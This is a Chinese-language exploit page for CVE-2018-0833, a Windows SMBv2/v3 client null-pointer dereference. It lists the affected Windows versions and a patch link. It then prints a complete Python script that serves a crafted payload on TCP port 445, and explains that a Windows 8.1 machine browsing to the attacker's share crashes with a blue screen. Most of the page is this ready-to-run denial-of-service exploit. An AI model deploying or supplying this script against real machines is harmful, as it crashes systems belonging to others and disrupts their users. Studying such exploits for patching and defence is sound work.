CVE-2018-0833

描述

The Microsoft Server Message Block 2.0 and 3.0 (SMBv2/SMBv3) client in Windows 8.1 and RT 8.1 and Windows Server 2012 R2 allows a denial of service vulnerability due to how specially crafted requests are handled, aka "SMBv2/SMBv3 Null Dereference Denial of Service Vulnerability".

影响版本

ProductVersionUpdateEditionTested
Windows 8.1:heavy_check_mark:
Windows Rt 8.1
Windows Server 2012R2

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0833

利用方式

测试系统Windows 8.1 x86

首先使用一台机器(测试使用的是kali)运行项目中的python脚本

# Exploit Title: Microsoft Windows SMB Client Null Pointer Dereference Denial of Service
# Date: 26/02/2018
# Exploit Author: Nabeel Ahmed
# Version: SMBv3
# Tested on: Windows 8.1 (x86), Windows Server 2012 R2 (x64)
# CVE : CVE-2018-0833

import SocketServer
from binascii import unhexlify
payload = '000000ecfd534d4241414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141'
class byebye(SocketServer.BaseRequestHandler):
        def handle(self):
                try:
                        print ("From:", self.client_address)
                        print ("[*]Sending Payload...")
                        self.request.send(unhexlify(payload))
                except Exception:
                        print("BSoD Triggered on", self.client_address)
                        pass
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),byebye)
launch.serve_forever()

然后用windows 8.1 x86这台机器去访问运行脚本的机器\\192.168.1.8,即可实现蓝屏

效果图如下

CVE

漏洞来源